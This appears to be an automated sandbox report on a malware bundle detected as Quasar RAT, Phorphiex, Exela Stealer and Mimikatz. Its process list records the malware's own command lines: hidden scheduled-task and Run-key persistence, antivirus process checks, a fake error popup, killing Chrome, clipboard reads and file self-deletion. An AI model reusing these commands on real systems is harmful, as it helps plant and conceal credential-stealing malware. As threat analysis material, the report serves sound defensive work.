Analysis Overview
SHA256
e4ec3a45621dd556deeea5f953fa05909c82630e9f17baf6b14272a0360d62d1
Threat Level: Known bad
The file 4363463463464363463463463.exe.zip was found to be: Known bad.
Malicious Activity Summary
Quasar family
Suspicious use of NtCreateUserProcessOtherParentProcess
Exela Stealer
Mimikatz family
Phorphiex payload
Quasar payload
Phorphiex, Phorpiex
Phorphiex family
Exelastealer family
Mimikatz
Quasar RAT
Grants admin privileges
mimikatz is an open source tool to dump credentials on Windows
Blocklisted process makes network request
Modifies Windows Firewall
Downloads MZ/PE file
Executes dropped EXE
Reads user/profile data of web browsers
Loads dropped DLL
Clipboard Data
Adds Run key to start application
Command and Scripting Interpreter: PowerShell
Indicator Removal: File Deletion
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Network Service Discovery
Suspicious use of SetThreadContext
Enumerates processes with tasklist
Hide Artifacts: Hidden Files and Directories
Drops file in Windows directory
Launches sc.exe
System Network Configuration Discovery: Wi-Fi Discovery
Permission Groups Discovery: Local Groups
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
Event Triggered Execution: Netsh Helper DLL
System Location Discovery: System Language Discovery
Unsigned PE
Browser Information Discovery
System Network Connections Discovery
NSIS installer
Runs net.exe
Uses Task Scheduler COM API
Scheduled Task/Job: Scheduled Task
Runs ping.exe
Suspicious use of SetWindowsHookEx
Collects information from the system
Gathers network information
Gathers system information
Suspicious behavior: GetForegroundWindowSpam
Views/modifies file attributes
Suspicious use of AdjustPrivilegeToken
Checks SCSI registry key(s)
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
Kills process with taskkill
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-28 19:40
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-28 19:40
Reported
2024-11-28 20:00
Platform
win11-20241007-en
Max time kernel
1199s
Max time network
1202s
Command Line
Signatures
Exela Stealer
Exelastealer family
Mimikatz
Mimikatz family
Phorphiex family
Phorphiex payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Phorphiex, Phorpiex
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
Grants admin privileges
mimikatz is an open source tool to dump credentials on Windows
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Clipboard Data
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Run\Administrator = "C:\\ProgramData\\Microsoft\\csrss.exe" | C:\Users\Admin\Desktop\Files\win.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\sysnldcvmr.exe" | C:\Users\Admin\AppData\Local\Temp\2641813856.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" | C:\Users\Admin\Desktop\Files\m.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Monster Update Service = "C:\\Users\\Admin\\AppData\\Local\\MonsterUpdateService\\Monster.exe" | C:\Windows\system32\reg.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Network Service Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ARP.EXE | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\arp.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Hide Artifacts: Hidden Files and Directories
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4444 set thread context of 3736 | N/A | C:\Users\Admin\Desktop\Files\PURLOG.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe |
| PID 2028 set thread context of 2732 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\System32\conhost.exe |
| PID 2028 set thread context of 3176 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\System32\dwm.exe |
| PID 3488 set thread context of 5064 | N/A | C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif | C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\Desktop\Files\m.exe | N/A |
| File opened for modification | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\Desktop\Files\m.exe | N/A |
| File created | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\AppData\Local\Temp\2641813856.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Permission Groups Discovery: Local Groups
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\choice.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1716412561.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1592010501.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\mimikatz.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\ewrvuh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1259121635.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1431716774.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2603430756.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\up.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1888623094.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\PctOccurred.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\120131490.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\164314122.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\route.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\sysnldcvmr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2420715866.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2641813856.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\arp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\sysnldcvmr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\386833483.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\m.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\twztl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\win.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\pei.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
System Network Connections Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Desktop\Files\up.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Desktop\Files\up.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Desktop\Files\up.exe | N/A |
Collects information from the system
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Runs net.exe
Runs ping.exe
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe.zip"
C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
C:\Users\Admin\Desktop\Files\ewrvuh.exe
"C:\Users\Admin\Desktop\Files\ewrvuh.exe"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Desktop\Files\PURLOG.exe
"C:\Users\Admin\Desktop\Files\PURLOG.exe"
C:\Users\Admin\Desktop\Files\m.exe
"C:\Users\Admin\Desktop\Files\m.exe"
C:\Users\Admin\Desktop\Files\test16.exe
"C:\Users\Admin\Desktop\Files\test16.exe"
C:\Windows\sysnldcvmr.exe
C:\Windows\sysnldcvmr.exe
C:\Users\Admin\Desktop\Files\up.exe
"C:\Users\Admin\Desktop\Files\up.exe"
C:\Users\Admin\AppData\Local\Temp\1809827666.exe
C:\Users\Admin\AppData\Local\Temp\1809827666.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Users\Admin\AppData\Local\Temp\2420715866.exe
C:\Users\Admin\AppData\Local\Temp\2420715866.exe
C:\Users\Admin\AppData\Local\Temp\1622938899.exe
C:\Users\Admin\AppData\Local\Temp\1622938899.exe
C:\Users\Admin\AppData\Local\Temp\164314122.exe
C:\Users\Admin\AppData\Local\Temp\164314122.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Start-Sleep -Seconds 5; Remove-Item -Path 'C:\Users\Admin\Desktop\Files\PURLOG.exe' -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
C:\Users\Admin\AppData\Local\Temp\2603430756.exe
C:\Users\Admin\AppData\Local\Temp\2603430756.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\System32\dwm.exe
C:\Windows\System32\dwm.exe
C:\Users\Admin\AppData\Local\Temp\1888623094.exe
C:\Users\Admin\AppData\Local\Temp\1888623094.exe
C:\Users\Admin\AppData\Local\Temp\1431716774.exe
C:\Users\Admin\AppData\Local\Temp\1431716774.exe
C:\Users\Admin\Desktop\Files\pei.exe
"C:\Users\Admin\Desktop\Files\pei.exe"
C:\Users\Admin\Desktop\Files\PctOccurred.exe
"C:\Users\Admin\Desktop\Files\PctOccurred.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Powell Powell.cmd & Powell.cmd & exit
C:\Users\Admin\Desktop\Files\built.exe
"C:\Users\Admin\Desktop\Files\built.exe"
C:\Users\Admin\AppData\Local\Temp\120131490.exe
C:\Users\Admin\AppData\Local\Temp\120131490.exe
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\Desktop\Files\built.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AFtqGY9CJmsw.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 193997
C:\Windows\SysWOW64\findstr.exe
findstr /V "JulieAppMagneticWhenever" Hist
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Medicines + ..\While + ..\Remained + ..\Bs + ..\Ak + ..\Statistical + ..\Entity + ..\Autumn + ..\Scott + ..\Keyboards y
C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif
Restructuring.pif y
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KH8E5zcj0SFv.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\twztl.exe
"C:\Users\Admin\Desktop\Files\twztl.exe"
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xFBWy8CFEcYS.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\build11.exe
"C:\Users\Admin\Desktop\Files\build11.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_2992_133772965421700862\stub.exe
C:\Users\Admin\Desktop\Files\build11.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "schtasks /query /TN "MonsterUpdateService""
C:\Windows\system32\schtasks.exe
schtasks /query /TN "MonsterUpdateService"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "schtasks /create /f /sc onlogon /rl highest /tn "MonsterUpdateService" /tr "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "MonsterUpdateService" /tr "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "schtasks /create /f /sc hourly /mo 1 /rl highest /tn "MonsterUpdateService2" /tr "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc hourly /mo 1 /rl highest /tn "MonsterUpdateService2" /tr "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Monster Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe" /f"
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Monster Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "chcp"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "chcp"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\chcp.com
chcp
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Get-Clipboard
C:\Windows\system32\chcp.com
chcp
C:\Windows\system32\cmd.exe
